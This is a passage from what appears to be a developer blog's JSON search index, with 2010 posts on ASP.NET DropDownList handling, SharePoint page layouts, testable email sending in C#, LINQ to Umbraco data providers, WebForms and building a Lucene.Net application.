DropDownList was available I needed to read the value (which was often set via JavaScript) back on the server.\nBut I noticed that the value I was setting via JavaScript wasn’t making it way back to the server if I read the dropDownList.SelectedValue property. Hmm I said to myself, I looked at the form, it’s setting the value right. The “selected” attribute was on the right option tag, but the value still isn’t on the server.\nIf I had set the value by clicking on it and selecting a value it was making it back.\nHmm…\nThen I realised, the difference between the two actions was the DropDownList wasn’t enabled in one of them, and when it wasn’t it was enabled the value wasn’t making it back.\nShit, that’s it! When a DropDownList isn’t enabled .NET seems to disregard the submitted value when loading the ViewState!\nBut the solution is simple:\n$(document).ready(function() { $('#submitButton').click(function() { $('select').removeAttr('disabled'); }); }); jQuery makes it super easy to find all the drop down lists and then make them enabled before the form submits.\nHere’s another example of how to do it if you’re using client-side validation and you want to make sure it’s passed:\n$(document).ready(function() { $('#submitButton').click(function() { if( Page_IsValid ) $('select').removeAttr('disabled'); }); }); Page_IsValid is the client variable updated with the result of the client side validation.\n", "id": "2010-08-28-no-value-when-settings-dropdown-with-javascript" }, { "title": "SharePoint feature corrupts page layout", "url": "https://www.aaron-powell.com/posts/2010-08-28-sharepoint-feature-corrupts-page-layout/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ "sharepoint" ], "description": "Are your SharePoint features corrupting your page layout?", "content": "Something that I’ve come across a few times when working on SharePoint/ MOSS 2007 features. When importing a Page Layout the ASPX some times becomes corrupt. You end up with additional HTML inserts once it’s been imported into SharePoint.\nThe corruption is in the form of HTML tags, outside the last </asp:Content> tag.\nWell it turns out that the problem is caused when you import an ASPX that has a </asp:content> tag it’ll happen. Did you notice the problem?\nThat’s right, if you have a lowercase c then it’ll import corrupt. Let me show the problem again, highlighted this time: </asp:content>\nAll you need to do is ensure that that has a capital letter, so the tag is </asp:Content> and it’s all good again.\nThe most common cause of this happening is doing a format-document within Visual Studio on the ASPX when it is in the features class-library project. Visual Studio doesn’t handle the ASPX file correctly, and formats it as a raw XHTML file, which dictates that the XHTML tags need to be in all lowercase.\n", "id": "2010-08-28-sharepoint-feature-corrupts-page-layout" }, { "title": "Testable email sending", "url": "https://www.aaron-powell.com/posts/2010-08-28-testable-email-sending/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ "c#", "testing" ], "description": "Creating an integration test of sending an email", "content": "Yesterday Shannon finally got with the times and learnt about the System.Net and how it can be used to dump emails to your file system.\nSomething I then mentioned to him on Twitter was that you can also use this method to test the email that was sent.\nFirst off lets write ourselves a very basic email sending test:\n[TestMethod] public void EmailSender() { var mail = new MailMessage(); mail.To.Add("example@somewhere.com"); mail.From = new MailAddress("example2@somewhere.com"); mail.Subject = "Testing Email"; mail.Body = "Sending Email. Woo!"; var smtp = new SmtpClient(); smtp.Send(mail); } So we’re assuming that we’ve set our config up so that we’re dumping the email to the file system. This is all well and good but how do we assert that the email was sent to the right person, and that the body/ subject was what we wanted? Well that can easily be done, if you know the structure of the .eml file which is generated when dumping the mail to the file system.\nI wrote a handy little class which can do this:\npublic sealed class EmlHelper { public string Path { get; set; } public string From { get; set; } public string To { get; set; } public string Subject { get; set; } public string Urls { get; set; } public EmlHelper(string path) { Path = path; string fc = new StreamReader(path).ReadToEnd(); From = Regex.Matches(fc, "From: (.+)")[0].ToString().Replace("From: ", string.Empty).Trim(); To = Regex.Matches(fc, "To: (.+)")[0].ToString().Replace("To: ", string.Empty).Trim(); Subject = Regex.Matches(fc, "Subject: (.+)")[0].ToString().Replace("Subject: ", string.Empty).Trim(); Urls = string.Empty; foreach (Match m in Regex.Matches(fc, @"https?://([a-zA-Z\\.]+)/")) { Urls += m.ToString() + ' '; } } } It’s a fairly basic class which you just need to understand the structure of the eml file, I used some regexes to break it apart. They may be a bit brittle (my regex skills aren’t crash hot) and I don’t support reading the body (as you really need to customise that for plain text vs HTML, and yeah, good luck there :P).\nNow all that we need to do is pass in the file name of the email which was generated.\nThe problem is that there isn’t really a good way to determine the email (someone know a way?), so you can just use LINQ to locate the file ordered by created date or something, but for this example I’m going to assume that there aren’t any other files in there anyway. So lets update our test method:\n[TestMethod] public void EmailSender() { var mail = new MailMessage(); mail.To.Add("example@somewhere.com"); mail.From = new MailAddress("example2@somewhere.com"); mail.Subject = "Testing Email"; mail.Body = "Sending Email. Woo!"; var smtp = new SmtpClient(); smtp.Send(mail); var emailSettings = (MailSettingsSectionGroup)ConfigurationManager .OpenExecConfiguration(ConfigurationUserLevel.Now) .GetSectionGroup("system.net/mailSettings"); var folder = emailSettings.MailSettings.Smtp.SpecifiedPickupDirectory.PickupDirectoryLocation; var eml = new EmlHelper(new DirectoryInfo(folder).GetFiles().First().FullName); //Assert Assert.AreEqual(mail.ToAddresses[0].Address, eml.To); Assert.AreEqual(mail.Subject, eml.Subject); //and so on } So there you have it, it’s very basic to use and make testable email sending.\n", "id": "2010-08-28-testable-email-sending" }, { "title": "Creating a RssDataProvider for LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-08-27-rssdataprovider-for-linq-to-umbraco/", "date": "Fri, 27 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "umbracodataprovider" ], "description": "Creating custom DataProviders for LINQ to Umbraco", "content": "Sorry to all the people who were kind enough to come to my LINQ to Umbraco session at CodeGarden 09, I said I would do this post soon after the session. Sadly I started enjoying Copenhagen too much without the need to be sitting at my laptop and now it’s a week later, I’m home and it’s time I come good on my promise.\n##The LINQ to Umbraco DataProvider model\nSomething that I have implemented with LINQ to Umbraco, and something which will be taking a stronger focus in Umbraco going forward, is a Provider model for the Umbraco data. What this means with LINQ to Umbraco? Well the classes generated for LINQ to Umbraco act as proxies to a data model, they don’t expect the data to come from anyway in particular.\nThis has a really neat advantage of the fact that you can write your own DataProvider which exposes the data from how ever you want. LINQ to Umbraco will ship as part of 4.1 with a single DataProvider, the NodeDataProvider. This enables the use of LINQ to Umbraco against the XML cache, which was the inital design of it.\n##Anatomy from a DataProvider\nThe DataProvider itself is an abstract class which has a number of methods which are implemented do different operations, the primary method you need to be implementing is the LoadTree method, this is responsible for the initial population of the collection from your data source.\nThere are other methods which have different uses, I wont be covering them in this post, but they will be going up on the new Umbraco wiki (which the LINQ to Umbraco section is starting to come up).\nThe LoadTree<TDocType> method needs to then return an instance of a Tree<TDocType>, which is another abstract class that needs to be implemented to handle the data mapping for your data provider.\n##Creating an RssDataProvider\nWhile we were hacking at the Umbraco Retreat prior to CodeGarden 09 I decided to try a proof-of-concept about how you could use the generated classes in a proxy manner. I may have written LINQ to Umbraco for this purpose, but it wasn’t something that I had actually tried to do. So I decided to create a basic little DataProvider which would read an RSS feed and turn the returned data from there into LINQ to Umbraco objects which could then be used in the Umbraco content tree.\nThe first step is you need to generate the LINQ to Umbraco classes, with Umbraco 4.1 you will be able to do this directly from the Settings -> Document Types node. I created a basic little Document Type named RSS Item and then generated the class for it.\nNext came the task of implementing my custom UmbracoDataProvider, I created my class:\npublic class RssDataProvider : UmbracoDataProvider { } And then set about implementing a constructor which takes the RSS feed URL (in this demo I used the Yahoo! Pipes which are on the homepage of our.umbraco) and then implemented the LoadTree method:\npublic override Tree LoadTree() { //supporting loading a full Tree //throw an exception if the type of the tree is an unsupported one if (typeof(TDocType) != typeof(RssItem)) { throw new NotSupportedException(typeof(TDocType).Name); }\n//create a request to the URL supplied WebRequest request = WebRequest.Create(this._feedUrl); //do a GET and string buffer the response HttpWebResponse response = (HttpWebResponse)request.GetResponse(); Stream dataStream = response.GetResponseStream(); StreamReader reader = new StreamReader(dataStream); string responseFromServer = reader.ReadToEnd(); //make a LINQ to XML representation of the RSS XDocument xdoc = XDocument.Parse(responseFromServer); //select the posts var items = xdoc.Descendants("item"); //make an RssTree from the items returned by the feed return new RssTree(items, this); } So now I have a load method which reads my RSS feed (and I’ve restricted it to only support my RssItem Document Type), now it’s time to create the RssTree from the provided data.\n##Tree<TDocType>\nThis class is really just a wrapper for the IEnumerable class. The way in which I have implemented the RssTree (and how I implemented the NodeTree) is by using delayed loading. What I mean is that the data isn’t converted from the source to the result until the GetEnumerator() method is called. This means that unless I do something with the collection there is no performance hit.\nThe following code is a bit of a hack (for the return type anyway) but that is because I wanted to show it being done without the use of reflection. If you want to see how to achieve it with a complete generic type check out the source for the NodeTree which is on Codeplex.\nAnyway here’s how the GetEnumerator() method looks:\npublic override IEnumerator GetEnumerator() { //this is a bit hacky as i only support 1 doc type //normally the load can be done via reflection (which is how the NodeTree works) foreach (var item in _items) { var rssItem = new TDocType() as RssItem; rssItem.Name = (string)item.Element("title"); rssItem.Link = (string)item.Element("link"); rssItem.Description = (string)item.Element("description"); rssItem.PublishDate = (DateTime)item.Element("pubDate"); rssItem.Content = (string)item.Element("content"); rssItem.CreateDate = (DateTime)item.Element("pubDate"); //Because RssItem may not be the type of TDocType (although in this example we'll assume it always is) //we have to downcast to DocTypeBase before casting to the generic. yield return (TDocType)(DocTypeBase)rssItem; } } So what’s going on, well first off we’re itterating through the collection of XML items returned from the initial load (_items) and then creating a new instance of the RssItem class and assigning the properties from the XML. You can see the comment mentioning the hack, having to do some crazy casting, that is because I’m not really doing the Generics properly.\nI’ve also implemented it via yield return, not building the entire collection into say a List and then returning its Enumerator. The reason for this is you’ll pick up a bit of performance if you are doing methods like Take(int) or breaking from a loop early. You should probably push the items into an internal collection to support caching (which is what the Node implementation does), but this is just a quick demo.\nAny that is as simple as it gets to write your own custom DataProvider for LINQ to Umbraco! Sure I’ve skipped a few sections (such as how to do child associations, but in this demo it’s not really viable) but hopefully this should give you a heads up on how to do it. And how does it work? Well just like this:\nusing (var ctx = new RssDataContext(new RssDataProvider("http://pipes.yahoo.com/pipes/pipe.run?_id=8llM7pvk3RGFfPy4pgt1Yg&_render=rss"))) { var feedItems = ctx.RssItems.Take(8); Assert.IsNotNull(feedItems); Assert.IsTrue(feedItems.GetEnumerator() != null); } That’s right, the above code is from a unit test, remember LINQ to Umbraco is capable of running outside of a web context so it is very easy to unit test!\n##Making this into an Umbraco Content Tree\nNow here is where the fun part comes in, you can easily turn the above data provider into a custom Umbraco tree. This means you can either make it into your own custom Umbraco module (/ application, what ever you call it!), or append it to the standard Content Tree! Isn’t THAT a funky idea hey!\nI’m not going to get too in-depth into this, Shannon Deminik has done some good documentation about that (again, see the wiki). So rather than going over the code I’m going to show it off in a short screencast and you can look into the provided source package with this post.\nThe screenscast is available here and the source code is here.\n", "id": "2010-08-27-rssdataprovider-for-linq-to-umbraco" }, { "title": "Creating custom DataProviders for LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-08-27-creating-custom-dataprovider-for-linq-to-umbraco/", "date": "Fri, 27 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "umbracodataprovider" ], "description": "Creating custom DataProviders for LINQ to Umbraco", "content": "Sorry to all the people who were kind enough to come to my LINQ to Umbraco session at CodeGarden 09, I said I would do this post soon after the session. Sadly I started enjoying Copenhagen too much without the need to be sitting at my laptop and now it’s a week later, I’m home and it’s time I come good on my promise.\n##The LINQ to Umbraco DataProvider model\nSomething that I have implemented with LINQ to Umbraco, and something which will be taking a stronger focus in Umbraco going forward, is a Provider model for the Umbraco data. What this means with LINQ to Umbraco? Well the classes generated for LINQ to Umbraco act as proxies to a data model, they don’t expect the data to come from anyway in particular.\nThis has a really neat advantage of the fact that you can write your own DataProvider which exposes the data from how ever you want. LINQ to Umbraco will ship as part of 4.1 with a single DataProvider, the NodeDataProvider. This enables the use of LINQ to Umbraco against the XML cache, which was the inital design of it.\n##Anatomy from a DataProvider\nThe DataProvider itself is an abstract class which has a number of methods which are implemented do different operations, the primary method you need to be implementing is the LoadTree method, this is responsible for the initial population of the collection from your data source.\nThere are other methods which have different uses, I wont be covering them in this post, but they will be going up on the new Umbraco wiki (which the LINQ to Umbraco section is starting to come up).\nThe LoadTree<TDocType> method needs to then return an instance of a Tree<TDocType>, which is another abstract class that needs to be implemented to handle the data mapping for your data provider.\n##Creating an RssDataProvider\nWhile we were hacking at the Umbraco Retreat prior to CodeGarden 09 I decided to try a proof-of-concept about how you could use the generated classes in a proxy manner. I may have written LINQ to Umbraco for this purpose, but it wasn’t something that I had actually tried to do. So I decided to create a basic little DataProvider which would read an RSS feed and turn the returned data from there into LINQ to Umbraco objects which could then be used in the Umbraco content tree.\nThe first step is you need to generate the LINQ to Umbraco classes, with Umbraco 4.1 you will be able to do this directly from the Settings -> Document Types node. I created a basic little Document Type named RSS Item and then generated the class for it.\nNext came the task of implementing my custom UmbracoDataProvider, I created my class:\npublic class RssDataProvider : UmbracoDataProvider { } And then set about implementing a constructor which takes the RSS feed URL (in this demo I used the Yahoo! Pipes which are on the homepage of our.umbraco) and then implemented the LoadTree method:\npublic override Tree LoadTree() { //supporting loading a full Tree //throw an exception if the type of the tree is an unsupported one if (typeof(TDocType) != typeof(RssItem)) { throw new NotSupportedException(typeof(TDocType).Name); }\n//create a request to the URL supplied WebRequest request = WebRequest.Create(this._feedUrl); //do a GET and string buffer the response HttpWebResponse response = (HttpWebResponse)request.GetResponse(); Stream dataStream = response.GetResponseStream(); StreamReader reader = new StreamReader(dataStream); string responseFromServer = reader.ReadToEnd(); //make a LINQ to XML representation of the RSS XDocument xdoc = XDocument.Parse(responseFromServer); //select the posts var items = xdoc.Descendants("item"); //make an RssTree from the items returned by the feed return new RssTree(items, this); } So now I have a load method which reads my RSS feed (and I’ve restricted it to only support my RssItem Document Type), now it’s time to create the RssTree from the provided data.\n##Tree<TDocType>\nThis class is really just a wrapper for the IEnumerable class. The way in which I have implemented the RssTree (and how I implemented the NodeTree) is by using delayed loading. What I mean is that the data isn’t converted from the source to the result until the GetEnumerator() method is called. This means that unless I do something with the collection there is no performance hit.\nThe following code is a bit of a hack (for the return type anyway) but that is because I wanted to show it being done without the use of reflection. If you want to see how to achieve it with a complete generic type check out the source for the NodeTree which is on Codeplex.\nAnyway here’s how the GetEnumerator() method looks:\npublic override IEnumerator GetEnumerator() { //this is a bit hacky as i only support 1 doc type //normally the load can be done via reflection (which is how the NodeTree works) foreach (var item in _items) { var rssItem = new TDocType() as RssItem; rssItem.Name = (string)item.Element("title"); rssItem.Link = (string)item.Element("link"); rssItem.Description = (string)item.Element("description"); rssItem.PublishDate = (DateTime)item.Element("pubDate"); rssItem.Content = (string)item.Element("content"); rssItem.CreateDate = (DateTime)item.Element("pubDate"); //Because RssItem may not be the type of TDocType (although in this example we'll assume it always is) //we have to downcast to DocTypeBase before casting to the generic. yield return (TDocType)(DocTypeBase)rssItem; } } So what’s going on, well first off we’re itterating through the collection of XML items returned from the initial load (_items) and then creating a new instance of the RssItem class and assigning the properties from the XML. You can see the comment mentioning the hack, having to do some crazy casting, that is because I’m not really doing the Generics properly.\nI’ve also implemented it via yield return, not building the entire collection into say a List and then returning its Enumerator. The reason for this is you’ll pick up a bit of performance if you are doing methods like Take(int) or breaking from a loop early. You should probably push the items into an internal collection to support caching (which is what the Node implementation does), but this is just a quick demo.\nAny that is as simple as it gets to write your own custom DataProvider for LINQ to Umbraco! Sure I’ve skipped a few sections (such as how to do child associations, but in this demo it’s not really viable) but hopefully this should give you a heads up on how to do it. And how does it work? Well just like this:\nusing (var ctx = new RssDataContext(new RssDataProvider("http://pipes.yahoo.com/pipes/pipe.run?_id=8llM7pvk3RGFfPy4pgt1Yg&_render=rss"))) { var feedItems = ctx.RssItems.Take(8); Assert.IsNotNull(feedItems); Assert.IsTrue(feedItems.GetEnumerator() != null); } That’s right, the above code is from a unit test, remember LINQ to Umbraco is capable of running outside of a web context so it is very easy to unit test!\n##Making this into an Umbraco Content Tree\nNow here is where the fun part comes in, you can easily turn the above data provider into a custom Umbraco tree. This means you can either make it into your own custom Umbraco module (/ application, what ever you call it!), or append it to the standard Content Tree! Isn’t THAT a funky idea hey!\nI’m not going to get too in-depth into this, Shannon Deminik has done some good documentation about that (again, see the wiki). So rather than going over the code I’m going to show it off in a short screencast and you can look into the provided source package with this post.\nThe screenscast is available here and the source code is here.\n", "id": "2010-08-27-creating-custom-dataprovider-for-linq-to-umbraco" }, { "title": "Understanding LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-08-27-understanding-linq-to-umbraco/", "date": "Fri, 27 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco" ], "description": "A look what LINQ to Umbraco is and what it isn't", "content": "When LINQ to Umbraco dropped with Umbraco 4.5.0 there was a lot of excitement around it and everyone started using it. Personally I was thrilled about this, LINQ to Umbraco was the culmination of 6 months of really solid development effort and I was glad to see that it was paying off.\nBut like all new technologies there can be miss-conceptions about what it is and what it isn’t and hopefully I’ll shed a bit of light on what the goal of LINQ to Umbraco is, what it is and what it isn’t.\n##Project Goals\nWhen I set about writing LINQ to Umbraco it was because I was frustrated at the lack of type safety coming from the NodeFactory API. This combined with the proliferation of magic strings to represent the properties made me think that there had to be a better way to go about it. Initial I achieved this with a project I dubbed the Umbraco Interaction Layer which was basically a wrapper for the Document API as I was doing a lot of creating and editing of nodes at the time using the API and I wanted it strongly typed.\nOnce I did the initial version of that I realised that people were wanting to do reads with it too, but this was not what the UIL was designed for, in fact reading was a REALLY bad idea with it as it relied on the Document API and did a hell of a lot of database calls.\nSo I set about doing a new version, a real version of LINQ to Umbraco, and something that looked a lot like LINQ to SQL.\nWhile doing the initial design for LINQ to Umbraco I decided on a few core ideas:\nNo reliance on any underlying API Extensibility Testability Close resemblance LINQ to SQL (which I was heavily working with at the time, and this was before it was killed :P) And for the most part LINQ to Umbraco that we see today does match with what I set out to achieve.\n##Removing the reliance on underlying API’s\nThis was really a core goal of mine with LINQ to Umbraco, I didn’t want to be tied to the Umbraco XML, nor did I want to be tied to the Document API, I’d made that mistake before and it cost me with the extensibility of the UIL, so I wanted to work out a way around this.\nWhile doing research into how LINQ to SQL works I came across something interesting, LINQ to SQL does kind of have the ability to swap out the data source. Seriously, if you check out the DataContext class in Reflector you’ll see that there’s a private field called provider which is the way it connects to the database. So LINQ to SQL could have been a more extensible framework (well, you can make it so via reflection) why not follow the same idea and make LINQ to Umbraco provider based?\nAnd that’s essentially what I did, in the form of the UmbracoDataProvider class. Since I figured that 99% of the time people are going to want to work with LINQ to Umbraco and not have to think about it I decided that I should create a default one that would work with the XML, as that’s what most people would be doing with it, replacing NodeFactory. This goal was achieved by creating the NodeDataProvider, which the default constructor for the UmbracoDataContext will use. Note that it’s called the **Node**DataProvider, implying that it works with the idea of Node in Umbraco, which is read-only (we’ll come to this shortly).\nSo ultimately what we’ve ended up with is a read-only way of accessing data in a strongly typed fashion in Umbraco.\n##Extensibility and LINQ to SQL\nAs I mentioned about LINQ to SQL had the initial design to be extensible (but since it’s being killed off at the moment in favor of Entity Framework I can understand the lacking desire to maintain to provider-based ORM’s :P) I wanted to have something similar with LINQ to Umbraco. By having the UmbracoDataProvider a class which you pass into the UmbracoDataContext you could easily swap this out for something else that you’ve written (at CodeGarden 09 I did a PoC of this with a very early version of LINQ to Umbraco and reading an RSS feed, this code will not work with 4.5 but is designed to get your brain working).\nAnd because I was going for LINQ to SQL as the original model for what I wanted I decided that I should try and maintain as much of the LINQ to SQL features as I wanted, one of the features that I ported is the SubmitChanges method.\n##CRUD with LINQ to Umbraco\nThis has caused a bit of confusion and it’s a lot to do with me not having written this section of my blog post already.\nOn the question of “Does LINQ to Umbraco support CRUD?” the short answer is Yes, with the long answer being “Yes, but only if your UmbracoDataProvider supports it”.\nIf you try doing SubmitChanges in LINQ to Umbraco with the NodeDataProvider you’ll wind up with a System.NotSupportedException being thrown. The reason for this is, as I mentioned earlier, the NodeDataProvider is read-only. Remember it maps to the concept of Node in Umbraco.\nAt the moment there is no released UmbracoDataProvider that I’m aware of which supports writing to the Umbraco database (or any database for that matter) but it is something that I hope to one day write about, it’s on my ever-increasing TODO list :P.\nSo basically out of the box LINQ to Umbraco will throw errors (and hopefully relevant errors) indicating that you’re not allowed to do CRUD.\n##Testability\nAnother equally high priority feature of LINQ to Umbraco that I wanted was the ability to test it. Umbraco is notoriously hard to test, I’ve written about it in the past, so I didn’t want to introduce anything with LINQ to Umbroco which would make it harder to do testing, in fact I wanted to introduce something that would make it easier to test.\nTo this end everything that you (should) need to be able to override in a unit testing scenario can be overridden in a unit testing scenario.\nI wont go into how to do that here, it’s something that deserves an entire set of articles but if you’re interested in unit testing with Umbraco I recommend you check out the article linked above.\n##Right tool for the right job\nLINQ to Umbraco was never designed to be a full replacement for everything Umbraco does, in fact it’s really designed as an alternative to XSLT’s.\nYou wouldn’t (well at least you shouldn’t) use XSLT to output a property from the current node in a page, and additionally you shouldn’t use LINQ to Umbraco for that. That is the role of <umbraco:Item /> and don’t take that away from it!\nSomething that people are starting to notice with LINQ to Umbraco is there is no built-in way to get the current page as a LINQ to Umbraco object. The reason for this is that LINQ to Umbraco is flat, it doesn’t really understand hierarchies, because hierarchies is something that is really a concept of the published Umbraco data (and to a lesser extent the database).\nWith LINQ to Umbraco you can easily access data from anywhere in the site, the UmbracoDataContext gives you list of all your types and you can grab all your data there, it’s not until you have an object can you start understanding hierarchies. From a single object you can go down and up it’s object graph, because now you have a contextual point to work with.\nSo when you’re thinking “Is LINQ to Umbraco right for me?” think about what you’re trying to achieve, if you want to work with just the current node then it’s probably not the right tool for you, in fact you’re probably even better off with just the standard Umbraco displaying of a node.\n##To dispose or not to dispose?\nSomething that you may notice with LINQ to Umbraco is that the UmbracoDataContext and the UmbracoDataProvider are both disposable objects, this was also ported from the LINQ to Umbraco idea, but generally it’s a bit less-than-desirable to achieve full disposal constantly.\nThe NodeDataProvider itself has quite a bit of caching built into it. Every time you request an object it will be looked up in its internal cache before it’s created, just in case it has previously been found. So deciding if you should be disposing of your object at the end of the unit of work really depends on how big your site is. A lot of the implementations which I’ve worked on we’ve actually chosen to run a singleton instance of the objects, and the reason for this is that we’ve got large sites.\nThere is nothing wrong with running a singleton for the UmbracoDataContext and UmbracoDataProvider objects, just keep in mind that you may get stale data. On the NodeDataProvider there is a Flush method, this will essentially force the cache to be cleared within it so that next time you’ll get new objects from the XML. The reason that the Flush method doesn’t reside on the UmbracoDataProvider is because it should be up to the implementor of the UmbracoDataProvider to decide if/ how they are caching objects.\n##IQueryable\nLINQ to Umbraco doesn’t implement IQueryable, instead it implements IEnumerable. If you’re interested in understanding why IEnumeraable was used rather than IQueryable I have covered that in its own article.\n##Conclusion\nHopefully this article has given you a bit of an insight into how LINQ to Umbraco was designed, what it was designed for and how you should be use it.\nEveryone who’s using it keep your feedback coming so that we can look to expand and evolve LINQ to Umbraco in Umbraco 4.5 and Umbraco 5.\n", "id": "2010-08-27-understanding-linq-to-umbraco" }, { "title": "All good things come to an end", "url": "https://www.aaron-powell.com/posts/2010-08-08-all-good-things-come-to-an-end/", "date": "Sun, 08 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "random-stuff" ], "description": "", "content": "As you have probably seen we at TheFarm require a senior .NET developer, and there is a some-what sad reason for this… I’ve decided to move on from TheFarm.\nI’ve taken a job with one of Australia’s top .NET consulting agencies, Readify. I’m really excited about having the opportunity to work with some of Australia’s best .NET developers, and I’m really quite excited about this chance.\nI do feel sad about leaving TheFarm though, I’ve had an awesome 12 months working with Shannon, I’ve learnt a shit load and made a great set of friends. And if you’re looking for a new job (or you’re thinking of moving to Australia) I’d recommend talking to the guys at TheFarm.\nWhat about Umbraco? When I took the job with TheFarm last year one of the main drives was to have the chance to work closer with Shannon on Umbraco (and producing the AUSPAC Mafia!) and moving on does not mean that I’m becoming less involved with Umbraco.\nIn fact, it’s the opposite really. Something that I’ve found being a core team member and an Umbraco user was that I often had to make a choice between the two. Anyone looking at codeplex will have seen my check-in’s drop off, and that was a lot to do with working every day with Umbraco, I was finding it hard to then come how and work on the core product as well. My new role is less Umbraco focused which is going to free up my desire to work on Umbraco more.\nAnd with v5 kicking along I’m really excited to get back into hard-core Umbraco core development.\nHere’s to the next chapter!\n", "id": "2010-08-08-all-good-things-come-to-an-end" }, { "title": "Yes, I LIKE WebForms!", "url": "https://www.aaron-powell.com/posts/2010-08-07-yes-i-like-webforms/", "date": "Sat, 07 Aug 2010 00:00:00 +0000", "tags": [ "webforms-mvp", "webforms", "web", "asp.net" ], "description": "I think ASP.Net WebForms is really quite good, and here's some thoughts on the topic", "content": "At some of my speaking engagements recently I’ve made the astonishing claim that I quite like ASP.Net WebForms. Why do I say this is an astonishing claim? Quite often when I’m talking to other ASP.Net developers and we end up on the topic of WebForms you can see a look of distaste in their eyes, or there’ll be a statement like “I’m stuck working with WebForms”.\nBut when you ask someone why they don’t like WebForms they generally don’t have a really good reason, they come up with a few points like:\nViewState is bloated Controls are heavy It’s not testable So I thought I’d share a few of my thoughts on the topic because well, everyone wants to hear my opinion :P.\nViewState ViewState is a double-edged sward and if you’re not familiar with it and what it’s goals are then you’re probably going to end up doing it wrong.\nFirst thing everyone should do when starting ASP.Net development is read this article by David Reed. The article may be 4 years old but everything still holds true today.\nAnd once you understand ViewState you can understand how to use it to your advantage. Keep in mind that ViewState can be turned on or off for any particular control (with .NET 4.0 the control is even better), and you really should be setting it properly.\nTo enable or to disable? When you turn ViewState on you’re adding weight to the response back to the client (well unless you use a different provider), and this is something that you need to be aware of. Take a look at the controls you’re using, what’s the data they have in them and what’s the cost of that data?\nSay you have a literal, or a label and you’re setting some text on it from a resource file. It’s not that expensive to do the text setting, so why have the framework do it for you at the cost to the end user?\nThis principle can be applied to any kind of control, and once you start looking at what you’re putting into your page you’ll realise just how often you don’t need to have ViewState enabled.\nA little bit of planning and you’ll not have to look at the giant ViewState slab.\nControls Controls are great, they package up some functionality and make it easy to redistribute. But people often say that this is one of the big downsides of WebForms and MVC gives you much better flexibility. But think about some of the trivial (read: boring) tasks which we have to do as developers:\nCreate a login form Output a collection of data using a template So with MVC this is something that you end up having to write yourself, sure there are some helpers like Html.EditorFor and stuff so you can quickly display something. And it’s true there’s plenty of good extensions to do things like Repeaters, so this is just taking WebForms concept into MVC right?\nOne of the other main criticisms of controls is that they generate HTML for you that is hard to style, and often unchangable. But think about what they are trying to generate, a standard design cross-browser. Try having a floating layout which can be dropped anywhere and look the same?\nTrue it makes them less flexible, but it depends what you’re trying to achieve.\nTestability I’ve done plenty of articles in the past about testibility so I’m not going to dwell too much. All I’m going to say is that you need WebForms MVP, it’s fantastic!\nConclusion I think that WebForms is a great framework and one that we’ll have with us for a long time still. If you understand what you’re working with, that it’s not MVC and there is a lot of power which it has to give you’ll learn that it isn’t really that bad :).\n", "id": "2010-08-07-yes-i-like-webforms" }, { "title": "Building an application with Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-07-10-building-an-application-with-lucene-net/", "date": "Sat, 10 Jul 2010 00:00:00 +0000", "tags": [ "lucene", "lucene.net", "c#" ], "description": "A more in-depth look at how to use Lucene for storage and building a simple application", "content": "For this article we’re going to go through building a small application with uses Lucene.Net as a storage model. I read a lot of blogs so I’m often find that when I’m working I want to refer back to a blog that I read in the past. The problem is that finding that particular blog can be tricky, navigating through a few thousand posts can be fairly tedious. So let’s build an application which we can quickly search and find the posts that I’m interested in.\n##Designing for Lucene\nAlthough Lucene is a Document Database it’s also a search engine. This means that Lucene can actually be used as a mid-point in the application you’re designing. This can be used to turn our data for the UI without having to go to your underlying data store. This can provide speed boosts (and generally does) if you’re using Lucene well.\n##To Store or not to Store…\nSo I’m wanting a way which I can quickly find blogs which are matching particular search terms, but I want it to be fast and I want it to be small. The blog posts are available on the web, so I can access them if/ when I need, but do I really need to have my application showing all the data too? I don’t think so, it would mean that my application needs to act a bit like a web browser, and this seems to be a bit silly. It also adds a dependency which I don’t really want in my application.\nWell this means that I don’t really need to store much data at all, I just need to store the indexes! Now all I need to work out is what I want to show on my UI.\nI’ve decided that I want only a very basic little UI, I just want to have a link to the article and the name of it. This means that I can save some space by not storing the content of the blog post in my index, after all, if you want to read the content you’re going out to the web.\nThis kind of split approach with Lucene is a common way to use Lucene. When working with Lucene the most performance intensive part of the process is actually getting the data back out of the index. Searching against Lucene is really fast, it’s what Lucene is designed for. So we have Lucene to mainly just store our analyzed version of our data, and then we have our underlying data store to retrieve all of the data.\n##Building the BlogManager\nI’m going to be making this little application using WPF (yep, the web developer is trying WPF, and it’s going… ok :P). First off I want a way to add RSS feeds to be able to search against:\nSo there we go, we’re able to provide the URL for a blog and we’re going to push some data into our index. I’m actually using Lucene to store the URL’s as well as the actual blogs to search against. Remember that a Document Database doesn’t have a schema, so you can stick anything in there that you want. Let’s see some code:\npublic MainWindow() { InitializeComponent(); var path = new DirectoryInfo(Path.Combine(new FileInfo(Assembly.GetExecutingAssembly().Location).Directory.FullName, "LuceneIndex")); if (!path.Exists) { path.Create(); path.Refresh(); } this.directory = new SimpleFSDirectory(path); this.analyzer = new StandardAnalyzer(Lucene.Net.Util.Version.LUCENE_29); this.writer = new IndexWriter(directory, analyzer, IndexWriter.MaxFieldLength.UNLIMITED); this.searcher = new IndexSearcher(directory, true); } This is just my setup method, and I’m setting up a few default objects which I want to persist within my application. I’m using the StandardAnalyzer (here’s more info on analyzers) and the SimpleFSDirectory as my storage model. It’s all just setup, not very interesting code, but it can’t hurt to show you this stuff :P.\nTo get the data from the feed I’m using the SyndicationFeed from the .NET framework, but you could parse the XML yourself, or use any other library if you really wanted, but this done a good enough job for what I need. You just use it like this:\nXmlReader xmlReader = XmlReader.Create(url); var feed = SyndicationFeed.Load(xmlReader); Now lets put our data into the index:\nvar doc = new Document(); doc.Add(new Field("name", feed.Title.Text, Field.Store.YES, Field.Index.NO)); doc.Add(new Field("url", url, Field.Store.YES, Field.Index.NO)); doc.Add(new Field("type", "BlogUrl", Field.Store.NO, Field.Index.ANALYZED)); writer.AddDocument(doc); For this I’m storing the title of the feed and the URL of it, this is because I’m wanting to show them in a data grid (so I can get an overview of what feeds 